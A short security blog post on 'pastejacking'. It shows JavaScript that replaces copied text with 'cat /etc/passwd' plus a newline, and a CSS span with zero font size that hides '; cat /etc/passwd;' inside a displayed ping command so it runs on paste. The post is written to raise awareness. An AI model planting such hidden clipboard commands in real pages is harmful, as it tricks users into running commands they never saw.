Social Engineering Featured

Copy and Paste Nightmares

Agyei Masters

2 min read
Copy and Paste Nightmares

Man...I hope yโ€™all read the disclaimer page.

Ramblings

If you're a developer, you would be guilty of heading over to Stackoverflow or some other site that may or may not be shadey to copy code from there. Can we help it? Maybe not, but hopefully after reading this lil post we all might be somewhat more aware of the dangers out there.

Why I need to be aware?

The fact that most of us at some point in our daily life may have googled something like... "How to ping an IP?" Google will give you some results on some sites on how to do this. In your mind you may see the solution to your question and jump quickly into doing the good ole Copy and Paste.

Go ahead and copy the command below and paste in the textarea provided afterwards.

$ ping 8.8.8.8

How did that happen?

Good Ole Javascript I'm afraid. Below is a snippet of code showing how I was able to use javascript's event Listener to see when someone is trying to copy a specific area on the site and replace their clipboard data with whatever I would like them to actually run over to their terminal and paste ๐Ÿ˜ˆ. 

document.getElementById('exploitHere').addEventListener(
	'copy', function(e){
		e.clipboardData.setData('text/plain',
			'cat /etc/passwd \n'
		);
	e.preventDefault();	
})
WhY nOt JuSt DiSaBlE jAvAsCrIpT?
$ ping ; cat /etc/passwd; 8.8.8.8

How did this happen again?

This time I ditched the good ole Javascript and used our dear old friend... Pure CSS. I was able to use a span element and use CSS to hide that element by decreasing it's font-size to zero. Take note of the snippet below.

<div>
	$ ping <span id="cssExploit">; cat /etc/passwd; </span> 8.8.8.8\n
</div>

<style type="text/css">
	#cssExploit{
		font-size: 0;
	}
</style>

So what then?

Try your best to stay frosty folks and beware of these dangers. ๐Ÿ˜…... Something that many might not have realised is the fact that a trailing newline '\n' was added to the end of each hidden commands...which means as soon as that is pasted in your terminal it runs without having to press enter.

So maybe you might want to think twice and paste it in a notepad before heading to your terminal. ๐Ÿ˜